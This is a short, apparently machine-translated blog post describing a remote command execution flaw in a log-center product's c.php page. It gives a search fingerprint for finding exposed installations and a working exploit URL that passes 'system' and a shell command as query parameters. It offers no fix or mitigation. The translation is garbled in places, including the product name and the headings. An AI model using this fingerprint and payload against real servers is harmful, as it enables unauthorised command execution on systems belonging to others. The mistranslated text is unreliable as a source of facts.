Post

Deepin Service Log Center C Php Remote Command Execution Vulnerability

Deepin Service Log Center C Php Remote Command Execution Vulnerability

#Shenxinshui Log Center c.php remote command execution vulnerability

Vulnerability Description

Deepin Service Log Center c.php remote command execution vulnerability, using the same template and some files as EDR, causing command execution

Vulnerability Impact

Secretly convinced Log Center

Network surveying and mapping

body=”isHighPerformance : !!SFIsHighPerformance,”

Vulnerability reappears

The login page is as follows

img

Access vulnerability Url

/tool/log/c.php?strip_slashes=system&host=ipconfig

img

This post is licensed under CC BY 4.0 by the author.